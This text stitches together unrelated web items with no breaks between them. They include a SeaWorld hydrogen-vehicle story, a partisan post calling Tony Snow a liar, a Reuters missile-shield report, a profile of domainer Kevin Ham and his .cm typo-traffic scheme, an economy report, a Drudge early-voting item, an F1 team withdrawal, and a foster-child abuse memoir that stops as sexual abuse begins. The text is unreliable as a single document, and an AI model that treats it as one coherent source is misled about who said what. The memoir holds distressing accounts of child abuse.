" The environment is really an important part of SeaWorld 's culture here , " said Kelly Bernish , director of environmental health and safety at Busch theme parks SeaWorld , Discovery Cove and Aquatica .
Bernish described the venture as another opportunity for " employees to feel like they can impact the environment by using this kind of vehicle , that will lessen our footprint on the world . "
SeaWorld 's Discovery Cove animal training supervisor Jay Tacey said " somebody has to get the ball rolling .
Until somebody takes that first step , there 's always going to be the ' what if ? ' "
Airport Operations Director Lewis said being in on the hydrogen experiment early could pay off in the long run .
" We are hopeful that since they built the facility here , the only one in the southeast United States , that there will be a long - term usage for it . "
All About Alternative Fuel Vehicles • Alternative Energy Technology
CNN jumps the shark , hires professional liar Tony Snow
Tony Snow , known more for his dishonesty than his skills as a reporter , was hired Monday by CNN as a conservative commentator .
Snow most recently served as press secretary to President Bush and was repeatedly exposed for lying about the Iraq war and the Alberto Gonzales fiasco .
Snow was a commentator at FOX " News " for 10 years and has also been a newspaper writer , radio host and columnist , and a speechwriter in the administration of the first President Bush .
CNN president Jon Klein
" In the White House , Tony brought a remarkably human touch to the discussion of public policy , which he will continue to do as part of the Best Political Team on Television .
He will contribute a unique breadth of political and journalistic expertise to what is already the most provocative and wide - ranging political analysis on the air . "
© By Dennis Zaki - AlaskaReport.com
All Rights Reserved .
We report - You decide
I 've just posted the first installment of a podcast reading of a new novella that I co-wrote with Hugo - and Nebula - nominee Benjamin Rosenbaum .
The story 's a big , 32,000 - word piece called " True Names " ( in homage to Vernor Vinge 's famous story of the same name ) , and it involves the galactic wars between vast , post - Singularity intelligences that are competing to corner the universe 's supply of computation before the heat - death of the universe .
Ben and I will be reading the story in weekly installments , taking turns as our schedules allow .
The reading is Creative Commons licensed — Attribution - ShareAlike - NonCommercial — and the story itself will be published this fall in Fast Forward 2 , Lou Anders ' followup to his knockout 2007 anthology , Fast Forward ( regular Boing Boing readers will remember Paul Di Filippo 's Wikiworld story from that volume ) .
Lou 's given us permission to post the story 's text simultaneous with the book 's publication , under the same Creative Commons license .
I had a nearly illegal amount of fun working on this story with Ben , who is a gonzo comp - sci geek with a real flair for phrasing , and I hope you 'll enjoy hearing it as much as we enjoyed writing it !
Link , Podcast feed
MOSCOW ( Reuters ) - Russia and the United States failed on Tuesday to find common ground over U.S. plans to deploy parts of a missile defence shield in eastern Europe .
Secretary of State Condoleezza Rice listens to remarks by Russia 's Foreign Minister Sergei Lavrov during a press availability after their meeting in Moscow , March 18 , 2008 .
REUTERS / Kevin Lamarque
Russian Foreign Minister Sergei Lavrov said he had agreed with U.S. Secretary of State Condoleezza Rice after six hours of talks in Moscow to study further U.S. proposals aimed at allaying Russian concerns about the shield .
The U.S. plan has plunged relations between the two countries to a post - Cold War low and negotiations on the proposals have already been running for almost six months .
“ On the matter of principle the positions of our two sides have not changed , ” Russian Defense Minister Anatoly Serdyukov said after taking part in the talks with Rice , Lavrov and U.S. Defense Secretary Robert Gates .
Time is running out to reach a deal before U.S. President George W. Bush ’s administration leaves office in under a year .
The United States says it wants to install radar and missile installations in Poland and the Czech Republic to protect against missile strikes from so - called “ rogue ” states , specifically Iran .
Russia says a shield would upset the strategic balance and threaten Russia ’s own security .
It has said it may return to its Cold War posture of targeting its nuclear missiles at Europe if the shield is built .
Briefing reporters after their meeting , Rice and Lavrov appeared upbeat and friendly , passing notes and joking together when a Russian reporter addressed her as “ Mrs Gates . ”
The last such four - way meeting was in Moscow in October .
Rice said they made progress on a so - called strategic framework agreement laying the foundations of U.S. - Russian relations for several years .
According to a U.S. official , the document lays out about 20 topics of mutual interest and cooperation split into four subject areas -- economics , security , weapons of mass destruction and terrorism .
Another senior U.S. official said one reason for the document was to bring more stability to Russia - U.S. relations .
“ There was a dominant theme that things were slipping , ” said the official , who spoke on condition of anonymity .
There was no agreement on how to replace the START treaty , a cornerstone arms control pact , when it expires next year .
Washington is resisting Russian pressure for a fully - fledged successor treaty .
COLD WAR PARALLELS
Disputes between Moscow and Washington over the missile shield , Kosovo ’s independence , the war in Iraq and Russia ’s human rights record have prompted some observers to draw parallels with the Cold War .
But economic ties are vibrant .
Trade between the two countries increased to $ 17.5 billion last year , from $ 15 billion in 2006 , and U.S. firms have invested heavily in Russia .
Lavrov ’s tone on the missile shield was more conciliatory than at previous meetings - a shift characterized by U.S. officials as progress .
Acknowledging that Washington was determined to deploy the shield , he said the talks should focus on mitigating what Moscow sees as the risks from it .
“ We have appreciated that while disagreeing with us in substance , they ( Washington ) agreed that their project fuels our concerns and offered proposals aimed at lifting or easing these concerns , ” Lavrov said .
Slideshow ( 3 images )
Another senior U.S. official said the Russians appeared to be taking a more “ pragmatic , realistic ” approach to missile defense as discussions heated up with the Czech Republic and Poland .
Washington ’s offer to Moscow includes allowing Russia to inspect the missile shield sites and not activating the system unless there is firm evidence Iran has , or is close to acquiring , a long - range missile strike capability .
The Russian ministers on Tuesday promised to closely examine the measures Washington was offering .
Similar promises though were made at October ’s meeting , prompting some U.S. officials to ask if Moscow was playing for time .
The Bush administration has less than 10 months left in office and Russia is eyeing what a new U.S. government might do on missile defense and other contentious issues .
“ The Russian leadership has two good allies -- time and U.S. policy .
If the Democrats win the U.S. presidential election , they could review the missile defense program , ” Russia ’s Vedomosti daily wrote in an editorial on Tuesday .
Kevin
Ham leans forward , sits up tall , closes his eyes , and begins to type -- into the air .
He 's seated along the rear wall of a packed ballroom in Las Vegas 's Venetian Hotel .
Up front , an auctioneer is running through a list of Internet domain names , building excitement the same way he might if vintage cars were on the block .
As names come up that interest Ham , he occasionally air - types .
It 's the ultimate gut check .
Is the name one that people might enter directly into their Web browser , bypassing the search engine box entirely , as Ham wants ?
Is it better in plural or singular form ?
If it 's a typo , is it a mistake a lot of people would make ?
Or does the name , like a stunning beachfront property , just feel like a winner ?
When Ham wants a domain , he leans over and quietly instructs an associate to bid on his behalf .
He likes wedding names , so his guy lifts the white paddle and snags Weddingcatering.com for $ 10,000 .
Greeting.com is not nearly as good as the plural Greetings.com , but Ham grabs it anyway , for $ 350,000 .
Ham is a devout Christian , and he spends $ 31,000 to add Christianrock.com to his collection , which already includes God.com and Satan.com .
When it 's all over , Ham strolls to the table near the exit and writes a check for $ 650,000 .
It 's a cheap afternoon .
Just a few years ago , most of the guys bidding in this room had never laid eyes on one another .
Indeed , they rarely left their home computers .
Now they find themselves in a Vegas ballroom surrounded by deep - pocketed bankers , venture - backed startups , and other investors trying to get a piece of the action .
And why not ?
In the past three years alone , the number of dotcom names has soared more than 130 percent to 66 million .
Every two seconds , another joins the list .
But the big money is in the aftermarket , where the most valuable names -- those that draw thousands of pageviews and throw off steady cash from Google 's and Yahoo 's pay - per - click ads -- are driving prices to dizzying heights .
People who had the guts and foresight to sweep up names shed during the dotcom bust are now landlords of some of the most valuable real estate on the Web .
The man at the top of this little - known hierarchy is Kevin Ham -- one of a handful of major - league " domainers " in the world and arguably the shrewdest and most ambitious of the lot .
Even in a field filled with unusual career paths , Ham 's stands out .
Trained as a family doctor , he put off medicine after discovering the riches of the Web .
Since 2000 he has quietly cobbled together a portfolio of some 300,000 domains that , combined with several other ventures , generate an estimated $ 70 million a year in revenue .
( Like all his financial details , Ham would neither confirm nor deny this figure . )
Working mostly as a solo operator , Ham has looked for every opening and exploited every angle -- even inventing a few of his own -- to expand his enterprise .
Early on , he wrote software to snag expiring names on the cheap .
He was one of the first to take advantage of a loophole that allows people to register a name and return it without cost after a free trial , on occasion grabbing hundreds of thousands of names in one swoop .
And what few people know is that he's also the man behind the domain world 's latest scheme : profiting from traffic generated by the millions of people who mistakenly type " .cm " instead of " .com " at the end of a domain name .
Try it with almost any name you can think of -- Beer.cm , Newyorktimes.cm , even Anyname.cm -- and you 'll land on a page called Agoga.com , a site filled with ads served up by Yahoo .
Ham makes money every time someone clicks on an ad -- as does his partner in this venture , the West African country of Cameroon .
Why Cameroon ?
It has the unforeseen good fortune of owning .cm as its country code -- just as Germany runs all names that end with .de .
The difference is that hardly any .cm names are registered , and the letters are just one keyboard slip away from .com , the mother lode of all domains .
Ham landed connections to the Cameroon government and flew in his people to reroute the traffic .
And if he gets his way , Colombia ( .co ) , Oman ( .om ) , Niger ( .ne ) , and Ethiopia ( .et ) will be his as well .
" It 's in the works , " Ham says over lunch in his hometown of Vancouver , British Columbia .
" That 's why I can't talk about it . "
He 's nearly as reluctant to share details about his newest company , called Reinvent Technology , into which he 's investing tens of millions of dollars to build a powerhouse of Internet businesses around his most valuable properties .
Given Ham 's reach on the Web -- his sites receive 30 million unique visitors a month -- it 's remarkable that so few people know about him .
Even in the clubby world of domainers , he 's a mystery man .
Until now Ham has never talked publicly about his business .
You wo n't find his name on any domain registration , nor will you see it on the patent application for the Cameroon trick .
There are practical reasons for the low profile :
For one , Ham 's success has drawn enemies , many of them rivals .
He once used a Vancouver post office box for domain - related mail -- until the day he opened a package that contained a note reading " You are a piece of s**t , " accompanied by an actual piece of it .
Bitter domainers are one thing , lawyers another .
And at the moment , Ham 's biggest concern is that corporate counsels will come after him claiming that the Cameroon typo scheme is an abuse of their trademarks .
He may be right , since this is the first time he 's been identified as the orchestrator .
When asked about the .cm play , John Berryhill , a top domain attorney who does n't work for Ham , practically screams into the phone , " You know who did that ?
Do you have any idea how many people want to know who 's behind that ? "
Kevin Ham is a boyish - looking 37 - year - old , trim from a passion for judo and a commitment to clean living .
His drink of choice : grapefruit juice , no ice .
His mild demeanor belies the aggressive , work - around - the - clock type that he is .
Ham frequently steers conversations about business back to the Bible .
Not in a preachy way ; it 's just who he is .
The son of Korean - born immigrants , Ham grew up on the east side of Vancouver with his three brothers .
His father ran dry - cleaning stores ; his mother worked graveyard shifts as a nurse .
A debilitating illness at the age of 14 led Ham to dream of becoming a doctor .
He cruised through high school and then undergraduate work and medical school at the University of British Columbia .
Christianity had long been a mainstay with his family , but as an undergrad , he made the Bible a focal point of his life ; he joined the Evangelical Layman 's Church and attended regular Bible meetings .
Ham recalls that it was about this time -- 1992 or 1993 -- that he was introduced to the Web .
A church friend told him about a powerful new medium that could be used to spread the gospel .
" Those words really struck me , " Ham says .
" It 's the reason I 'm still working . "
After he graduated from med school in 1998 , Ham and his new bride took off for London , Ontario , for a two - year residency .
By the second year , Ham had become chief resident , and when he was n't rushing to the emergency room , he indulged his growing fascination with the Net , teaching himself to create websites and to code in Perl .
Information about Web hosting at the time was so scattered that Ham began creating an online directory of providers , complete with reviews and ratings of their services .
He called it Hostglobal.com .
From there it was a short step to the business of buying and selling domains .
About six months after he launched Hostglobal , Ham was earning around $ 10,000 per month in ad sales .
But when one of his advertisers -- a service that sold domain registrations -- told him that a single ad was generating business worth $ 1,500 a month , Ham figured he could get in on that too .
It made sense : People shopping for hosting services were often interested in buying a catchy URL , so Ham launched a second directory , called DNSindex.com .
Like similar services operating at the time , it gave customers a way to register domain names .
But Ham added the one feature that early domain hunters wanted most : weekly lists of available names , compiled using free sources he found on the Web .
Some lists he gave away ; others he charged as much as $ 50 for .
In a couple of months , he had more than 5,000 customers .
By the time he finished his residency in June 2000 , his two small Web ventures were pulling in more money in a month -- sometimes $ 40,000 -- than Ham made that year at the hospital .
That was enough , he reasoned , to put off starting a medical practice for three more months , maybe six .
" It just did n't make sense not to do it , " he says .
With a new baby in tow , Ham and his wife moved back to Vancouver , settling into a one - bedroom apartment .
Ham 's timing , it turned out , was spot -on .
Tech stocks were tumbling , dotcoms were folding left and right , and investors were fleeing the Web .
More important to him , hundreds of thousands of valuable domain names that were suddenly considered worthless began to expire , or " drop . "
Ham and a handful of other trailblazers were ready to snap them up .
Figuring out when names would drop was tedious work .
At the time , Network Solutions controlled the best names ; it was for a long time the only retail company , or registrar , selling .coms .
It did n't say when expiring names would go back on the market , but twice a day it published the master list of all registered names -- the so - called " root zone " file ( now managed by VeriSign ( Charts ) ) .
It was a fat list of well over 5 million names that took hours to download and often crashed the under - powered PCs of the day .
So Ham wrote software scripts that compared one day 's list with the next .
Then he tracked names that vanished from the root file .
Those names would be listed briefly as on hold , and Ham figured out that they would almost always drop five or six days later -- at about 3:30 a.m. on the West Coast .
In the dark of night , Ham launched his attacks , firing up five PCs and multiple browsers in each .
Typing furiously , he would enter his buy requests and bounce from one keyboard to the next until he snagged the names he wanted .
He missed a lot of them , of course .
Ham had no clue that there were rivals out there who were way ahead him , deploying software that purchased names at a rate that Ham 's fingers could n't match .
Through registration data , he eventually traced many of those purchases to one owner : " NoName . "
Behind the shadowy moniker was another reclusive domain pioneer , a Chinese - born programmer named Yun Ye , who , according to people who know him , operated out of his house in Fremont , Calif .
By day Ye worked as a software developer .
At night he unleashed the programs that automated domain purchases .
( Ye achieved deity status among domainers in 2004 when he sold a portfolio of 100,000 names to Marchex , a Seattle - based , publicly traded search marketing firm , for $ 164 million .
He then moved to Vancouver . )
Ham went back to the keyboard , writing scripts so that he , too , could pound at the registrars .
Ham 's track record began to improve , but he still was n't satisfied .
" Yun was just too good , " he says .
Then Ham did something brash :
He bought his way to the front of the line .
Since registrars had direct connections to Network Solutions 's servers , Ham 's play was to cut out the middleman .
He struck deals with several discount registrars , even helping them write software to ensure that they captured the names Ham wanted to buy during the drops .
In exchange for the exclusivity , Ham offered to pay as much as $ 100 for some names that might normally go for as little as $ 8 .
Within weeks
Ham had struck so many deals that , according to rivals , he controlled most of the direct connections .
" I kept telling them to hit them harder , " Ham says in a rare boastful moment .
" We brought down the servers many times . "
During one six - month period starting in late 2000 , Ham registered more than 10,000 names .
Rival domainers , locked out of much of the action , did n't appreciate Ham 's tactics .
It was one of them , most likely , who sent him the turd .
" Kevin came in and closed the door for everyone else , " says Frank Schilling , a domainer who figured out what Ham had done and sealed similar deals .
" There was a ton of professional jealousy . "
Ham , in fact , owes a lot to Schilling .
Both men lived in Vancouver at the time , and after Ham sought out Schilling in November 2000 , the two met at a restaurant to compare notes .
" How much traffic do you have ? "
Schilling asked .
An embarrassed Ham replied that he had no idea .
Schilling mentioned that he was experimenting with a new service , GoTo.com , that would populate his domains with ads .
Ham spent the next week figuring out how much traffic his sites were generating , and he was amazed by the initial tally : 8,000 unique visitors per day from the 375 names he owned at the time .
" From then on , " Ham says , " I knew that what I was building would be very , very valuable . "
He soon signed up with GoTo ( which was later purchased by Yahoo ) .
On his first day , Ham made $ 1,500 .
The system worked then as it does now : People do n't always use Google or Yahoo to find something on the Web ; they 'll often type what they 're looking for into a browser 's address bar and add " .com . "
It 's a practice known as " direct navigation , " or type - in traffic , and millions do it .
Need wedding shoes ?
Type in " weddingshoes.com " -- a site that Ham happens to own -- and you 'll land on what looks like a shoe - shopping portal , filled with links from dozens of retailers .
Click on any one of those links , and the advertiser that placed it pays Yahoo , which in turn pays a cut to Ham .
That single site , Ham says , brings in $ 9,100 a year .
Small change , maybe , but the name cost him $ 8 , and his annual overhead for it is about $ 7 .
Multiply that model several thousand times over , and you get a quick idea of the kind of cash machine that Ham was creating from his living room .
By early 2002 , roughly $ 1 million a year was pouring into Ham 's operation , which he ran with the help of his high school friend and current partner , Colin Yu .
But again he felt the tug of his conscience .
He occasionally left Vancouver to do medical missionary stints , helping patients in Mexico , the Philippines , and China .
He found the experience rewarding , but the development boom he saw taking off in China just reminded him of the virtual real estate boom he was leading back home .
Soon Ham was back working full - time on the Web .
" There was just too much more to do , " he says .
There was no looking back .
The next few years were among Ham 's most aggressive .
One of his most valuable tricks was one he had experimented with in the early days , a practice called domain " tasting . "
Tasting takes advantage of a provision that allows domain - name buyers a free five - day trial period .
Intended to protect customers who mistakenly purchase the wrong name , it handed aggressive domainers another means with which to expand -- and exploit -- their portfolios .
Ham cobbled together new lists of domain words in every combination , registering hundreds of thousands of new names for free , monitoring the traffic , and then returning the duds .
By 2004 , Ham had amassed such a deep portfolio that he pulled his names from third - party registrars , launched his own registrar , and then created another company , appropriately named Hitfarm , that could do a better job than Yahoo of matching ads with domain names -- for himself and 100 or so other domainers .
Like any shopping spree , though , Ham 's tasting binge did n't last .
It brought in so many names -- offbeat strings of letters , names with too many dashes , and other variations that humans would be hard - pressed to think of -- that Ham saw the quality of his portfolio dropping in proportion to its growing size .
For every few thousand names he 'd register , he 'd toss back all but a hundred or so .
Tasting exacerbated another problem too : Ham 's software grabbed all kinds of typographical variations of trademarked names .
Called typo-squatting , it 's a practice now coming under the same intense scrutiny long faced by cybersquatters .
Microsoft and Neiman Marcus are just two companies whose lawyers have brought anti-cybersquatting lawsuits , charging domainers with intentionally profiting from variations of their trademarks .
" Tasting changed everything , " says Ham , who has since abandoned the practice , though he concedes that Hitfarm still holds some problematic names .
" I said , forget it , " he says .
" Generic names are already too hard to come by .
And the legal risks are too great . "
The legal risks should diminish , however , if you do n't own the domain names at all -- and that 's the secret behind the Cameroon play .
The domain confab in Vegas is like any other trade conference :
The real intrigue happens at cocktail hour .
One subject in the air is Cameroon .
Late last summer , domainers began noticing that something odd happens to .cm traffic :
It all winds up at a site called Agoga.com .
Domainers know , of course , that .cm belongs to Cameroon .
And they know that whoever controls Agoga.com has created a potential gold mine .
What they do n't know is who 's behind it all .
At one of the meet - and - greets , Ham is standing drinkless , as usual , sporting a polo shirt , chatting with a few people he knows and some he 's just met .
In this crowd , it seems , everyone wants to know Ham .
Finally , he is alone .
" I hear you 're the guy behind .cm ? "
Ham looks surprised by the reporter 's question , then flashes a big smile and says , " I had help . "
Over a series of conversations a few weeks later in Vancouver , Ham shares some details about a deal that , despite his innate reticence , he 's clearly proud of .
About a year ago , he says , he worked his contacts to gain connections to government officials in Cameroon .
Then he flew several confidantes to Yaound ? , the capital , to make their pitch .
His key programmer went along to handle the technical details .
" Hey , " Ham says , flagging his techie down near the office elevator .
" Did n't you meet with the president of Cameroon ? "
" Nah , " the programmer says .
" We met with the prime minister .
But we did see the president 's compound . "
It 's an odd scene to picture : a domainer 's reps in a sit - down with Ephraim Inoni , the prime minister of Cameroon , to discuss the power of type - in typo traffic and pay - per - click ads .
And yet , as with most of the angles Ham has played , the Cameroon scheme is ingeniously straightforward .
Ham 's people installed a line of software , called a " wildcard , " that reroutes traffic addressed to any .cm domain name that is n't registered .
In the case of Cameroon , a country of 18 million with just 167,000 computers connected to the Internet , that means hundreds of millions of names .
Type in " paper.cm " and servers owned by Camtel , the state - owned company that runs Cameroon 's domain registry , redirect the query to Ham 's Agoga.com servers in Vancouver .
The servers fill the page with ads for paper and office - supply merchants .
( Officials at Yahoo confirm that the company serves ads for Ham 's .cm play . )
It all happens in a flash , and since Ham does n't own or register the names , he 's not technically typo- squatting , according to several lawyers who handle Internet issues .
The method is spelled out in a patent application filed by a Vancouver businessman named Robert Seeman , who Ham says is his partner in the venture and who also serves as chief adviser at Reinvent Technology .
( Seeman declined to be interviewed for this story . )
Ham wo n't reveal specifics but says Agoga receives " in the ballpark " of 8 million unique visitors per month .
Fellow domainers , naturally , are envious .
" As soon as it started happening , there was a huge sense of ' Why did n't I think of that ? ' " says attorney Berryhill , who represents Schilling and other domainers .
Still , several companies have already tracked down Ham 's attorneys , claiming trademark infringement .
Ham argues that his system is legally in the clear because it treats every.cm typo equally and does n't filter out trademarked names .
Berryhill concurs .
" You can't really say that [ wildcarding ] is targeting trade - marks , " he says .
" It captures all the traffic , not just trademark traffic . "
Moreover , the anti-cybersquatting statute applies only to people who register a trademarked domain ; using a wildcard does n't require registering names .
Clever though it may be , .cm is " a very small part of our operations , " Ham says .
He wo n't disclose how much he pays to the government of Cameroon , whose officials could not be reached for comment .
The partnership has been a rocky one so far , and the system has sporadically shut down .
But .cm is only one of several country domains where the typo play can work .
According to Ham , he and his team are working with other governments .
The dream typo play -- . co -- belongs to Colombia , to which Ham says Seeman paid several visits long before they began working on Cameroon .
( Citing safety concerns , Ham has n't yet made the trip .
" I would only go if the president requests to meet me , " he says . )
As for other countries he might soon invade , Oman ( .om ) is an obvious target .
Niger and Ethiopia are out there too , but since they would play off less lucrative .
net typos , they might not be worth the trouble .
As for Colombia , Ham says , " we 're making progress . "
Ham leans over his office PC to check on a domain auction .
Steven Sacks , a domainer based in Indianapolis who works for Ham , is telling him about some names up for sale .
Ham shoots back an instant message : " I like doctordegree.com ... and rockquarry.com ... sunblinds.com . "
The days of figuring out the drop are long over .
Everything 's open now .
Lists are easy to obtain .
You can preorder a name before it drops and hope to get it .
Or , like Ham , you can shell out five or six figures in online auctions .
The only great deals , at least for .com names , tend to happen privately , when a domainer manages to find an eager or naive seller .
Ham still buys 30 to 100 names a day , but he 's no longer getting them on the cheap .
In fact , he and Schilling , who today maintains a $ 20 million - a - year portfolio from his home in the Cayman Islands , are often accused of driving up prices .
Take , for example , the $ 26,250 Ham paid for Fruitgiftbaskets.com , or the $ 171,250 for Hoteldeals.com .
" The amount he will pay is crazy , " says Bob Martin , president of Internet REIT , a domain investment firm that has raised more than $ 125 million from private investors , including Maveron , the venture firm backed by Starbucks founder Howard Schultz .
Nonsense , Ham says .
The names are expensive only if you value them the way people like Martin do .
The VCs and bankers , who were late to the domain gold rush , assess names by calculating the pay - per - click ad revenue and attaching a multiple based on how long it would take to pay off the investment .
Viewed that way , Ham 's personal portfolio alone is worth roughly $ 300 million .
But some of Ham 's recent domain purchases would also look silly :
They 'd take 15 or 20 years just to justify the price , and that assumes continuation of the pay - per - click model .
But Ham is taking a longer view .
The Web , he says , is becoming cluttered with parked pages .
The model is amazingly efficient -- lots of money for little work -- but Ham argues that Internet users will soon grow weary of it all .
He also expects Google , Microsoft , and Yahoo to find ways to effectively combat typo-squatting .
Some browsers can already fix typos ; Internet Explorer catches unregistered domains and redirects visitors to a Microsoft page -- in effect controlling traffic the same way that Ham is doing with .cm .
" The heat is rising , " Ham says .
When Ham buys a domain now , he 's not doing pay - per - click math but rather sizing it up as a potential business .
Reinvent Technology aims to turn his most valuable names into mini media companies , based on hundreds of niche categories .
Among the first he'd like to launch , not surprisingly , is Religion.com .
Ham recently leased the entire 27th floor in his Vancouver building and is now hiring more than 150 designers , engineers , salespeople , and editorial folks .
Much of that effort is going into developing search tools based more on meaning and less on keywords .
" Google is only so useful , " Ham says .
The aim is to apply a meaning - based , or " semantic , " system across swaths of sites , luring customers from direct navigation and search engines alike .
Religion.com would then become an anchor to which scores of other sites would be tied .
" It 's time to build out the virtual real estate , " Ham says .
" There 's so much more value in these names than pay - per- click . "
Seeman 's patent application even mentions the possibility of turning Web traffic from Cameroon and other future foreign partners into full - fledged portals .
It 's all part of the master plan , as Ham aims to become the first domainer to move from the ranks of at - home name hunter to Internet titan .
Smaller players have been selling out to VC - backed groups , and Ham expects that the best names will eventually be owned by just a handful of companies .
If he bets right , he might very well be one of them .
" If you control all the domains , " he says , " then you control the Internet . "
[ Via - The man who owns the Internet ]
A Simple Trick That Lets You Buy Any Bestseller For A Buck
Dude , Your Tech Support Rocks !
No More Tasting : It ’s a Bad Year To Be a Registrar
Domain Name Game Still Going Strong ; Tad Less Secretive
Domain king 's rivers of gold
The bleak report does not bode well for the economy ’s future prospects , economists said .
Spending is the primary engine of the economy , accounting for more than two - thirds of gross domestic product .
If these pistons start to slow , the system is likely to sputter to a halt .
An earlier report on the economy ’s performance in the first quarter , released Wednesday by the Commerce Department , showed consumption at its weakest point since the recession of 2001 .
Spending is expected to tick up slightly after the government mails out tax rebates in an effort to stimulate the economy .
But economists said the coming rebates were unlikely to prop up sales for long .
“ The worry is that after that relief fades away , the consumer will still be faced with the same underlying problems , ” said Nigel Gault , chief United States economist at Global Insight , a forecasting firm , in a note .
“ Any burst of spending based on the stimulus payments is likely to prove short - lived . ”
Thursday ’s report also provided little comfort to the Federal Reserve , which is trying to avoid a recession while keeping price pressures in check .
The Fed , in determining inflation dangers , is said to keep close track of a figure in the report that measures prices of goods that exclude energy and food products , which are considered volatile from month to month .
This figure , known as the core personal consumption expenditures price deflator , ticked up to 2.1 percent in March from 2 percent in February , slightly above the Fed ’s presumed “ comfort zone . ”
Separate reports on Thursday revealed problems in the construction and manufacturing sectors , which have been battered in the last year by the housing slump .
Residential construction fell sharply in March , shrinking 4.6 percent as builders cut back on groundbreakings or stopped work on projects .
Over all , spending on construction declined 1.1 percent in March after rising 0.4 percent in February , the Commerce Department said .
Meanwhile , a bellwether gauge of manufacturing activity stayed flat in April as companies laid off workers .
The Institute of Supply Management ’s index was unchanged at 48.6 last month .
Inventories and export orders rose , but new orders stagnated .
Wall Street ’s focus turns now to the Labor Department ’s report on unemployment in April , which will be released Friday .
Economists predict that employers shed up to 100,000 jobs last month , a forecast bolstered by a report on Thursday that claims for unemployment benefits rose by 35,000 , to 380,000 last week .
Economists had forecast an increase of 18,000 .
NORTH CAROLINA : TRUMP +142,000 OVER ROMNEY EARLY VOTINGMon Nov 07 2016 13:01:41 ET
** World Exclusive ** Another dramatic turn of events is being reported out of North Carolina this afternoon : Donald Trump has jumped past all expectations in early voting !
In 2012 , Romney hit Election Day down 447,000 votes , based on early ballots .
He went on to win the state by 97,000 votes .
Now , the DRUDGE REPORT can reveal , Trump opens Election Day down 305,000 !
EDITOR'S
NOTE : A poll going into this week had Trump nearing 50 % in the Old North state .
Developing ...
Super Aguri today announced its withdrawal from the Formula One world championship with immediate effect , leaving British F1 hopeful Anthony Davidson and Takuma Sato without a drive for the rest of the season .
Super Aguri team officials were apparently denied access to Istanbul Park ahead of this weekend ’s Turkish Grand Prix .
Reports suggested the Japanese team , which has always been closely affiliated with Honda , was fighting for survival .
It had debts of around £ 50 million .
A takeover bid by the Magma Group collapsed and financing from German automotive company Weigl Group was not enough to keep Super Aguri racing .
After the Spanish GP , Honda stated that it could give Super Aguri the money to race and get home , but that the association would go no further .
Aguri Suzuki , Super Aguri team principal , confirmed the withdrawal .
“ I have participated in the championship for two years and four months as the Super Aguri F1 team , ” he said .
“ But regretfully I must inform you that the team will be ceasing its racing activities as of today .
” He added , “ The breach of contract by the promised partner SS United Group Company Limited resulted in the loss of financial backing and immediately put the team into financial difficulties .
Also , the change in direction of the environment surrounding the team , in terms of the use of customer chassis , has affected our ability to find partners . ”
Will Powell
Last updated at 08:30 01 February 2008
In April 2007 , foster mother Eunice Spry was sentenced to 14 years in prison for abusing children in her care .
She beat the youngsters with metal bars and made them eat vomit .
On Saturday , in our first extract from a new memoir , one of Spry 's victims , ALLOMA GILBERT , revealed how she survived her ordeal .
Here , in the final part , she describes how Spry allowed her to be sexually abused - and the bitter - sweet moment her tormentor was brought to justice ...
My foster mother was incandescent with rage .
" What 's this ? " she barked , holding up a bag of porridge oats .
I knew better than to say " a bag of porridge oats " - that would certainly have earned me a beating , or worse .
There was obviously something seriously wrong .
" You left it out , " continued Eunice accusingly , tipping the bag 's contents on to the kitchen table .
I could see that mixed in with the oats were little brown lumps - mouse or even rat droppings .
There had , I knew , been some rats recently around the dilapidated old farm where we lived , and I dare say she was right that I had forgotten to put the bag away the day before .
Eunice said nothing more , but scraped up the oats and put them into a saucepan , droppings and all .
She then poured in some water , and stirred .
" I 'll make your breakfast for you , " she said .
When the concoction was cooked , she spooned a large , steaming helping into a bowl .
It was a far bigger portion than she would usually allow me for breakfast - Eunice was unbelievably mean with food .
She handed me a spoon .
" Eat it , " she commanded .
When I did n't move , Eunice pushed the spoon into the bowl and brought it up against my closed lips .
" Open wide . "
It was pointless to resist .
Obediently , I opened my mouth and swallowed the vile mixture .
It tasted like the soles of my Wellingtons after I 'd cleaned out the chicken shed .
My gorge rose and I could see a glint in Eunice 's eyes - her satisfaction would be complete if I threw up there and then .
But I did n't .
Instead , I fought to turn myself off at the emotional mains and ate the whole lot .
I could tell Eunice was waiting for me to give up so that she could give me a beating , but I was determined to show her what I was made of .
She was obviously disappointed .
" Well , you do that again and you 'll get it again , " she said .
By now my stomach was churning .
I have to hold it down now , I told myself .
Just blank yourself out .
Eunice started tidying up and I feigned as much nonchalance as I could muster .
I could feel my gorge rising again , but I swallowed hard as saliva filled my mouth and kept my face as blank as I could .
Slowly , I moved towards the kitchen door .
The second I was out of Eunice 's sight , I ran like the clappers down the field , where I threw up the entire contents of my poisoned stomach .
But I had n't given her the satisfaction of seeing it .
And most important of all , I had chalked one up to me in our battle of wills .
If my childhood with my foster mother Eunice Spry had been traumatic - as I described in this paper on Saturday - my young womanhood , before I finally escaped from her evil clutches at 17 , was quite appalling in its physical and psychological brutality .
At least when I was young I had been to school for part of the time , having contact with other adults and children .
I had even very occasionally seen my natural parents .
Now I was being taught at home and living as a virtual prisoner , half - starved , on a rundown farm in the middle of nowhere .
I also had n't had any contact with my family for years .
I still wonder whether Eunice used to lie in bed at night thinking of the next horrible thing she would do to us all .
Certainly , some of her punishments involved a good deal of ingenuity on her part .
One of her favourites was a torture she 'd devised , known as the " invisible chair " .
We had to crouch down on our haunches in a sitting position , with our backs or shoulders leaning against the wall , sort of squatting , and we'd have to stay there for ten minutes to an hour , maybe even two .
I found it incredibly difficult to stay upright , and my legs ached terribly , so I 'd often fall over .
But Eunice would watch and hit me with a stick , or shout that I had to get back into the upright , crouching position in the invisible chair and stay there until she was satisfied .
Later , when I got a bit older , the punishments changed slightly to cause me the maximum psychological and physical discomfort .
Eunice would sometimes , for example , make me stand naked at the end of her bed - something I found hideously embarrassing , as I was extremely self - conscious about my developing body .
If she fell asleep I 'd quickly cover myself up , or lie down on the floor .
But then she'd wake up again and shake me or shout at me , and I had to spring back to my standing position .
Naked again , all night long .
Eunice 's attitude to nakedness and sex was somewhat ambivalent , and made life very confusing for us as growing teenagers .
On the one hand she would say it was natural and fine for us children to be naked , but at the same time she was also very prudish about anything to do with sex or sexuality , perhaps because of her strict interpretation of her Jehovah 's Witness faith .
During those years of puberty she certainly gave us no sex education or guidance to prepare us for the adult world , and because we never mixed with other young people , we were completely ignorant of the most basic facts of life .
As a result , I was completely unprepared for a catalogue of sexual abuse I suffered over a period of many years at the hands of one of Eunice 's old friends , a man I shall call Kevin .
I do n't know where Eunice knew him from but he was quite a rough type who seemed very interested in my developing body .
Whenever he came to visit , he would make me sit on his lap while he put his arms round me .
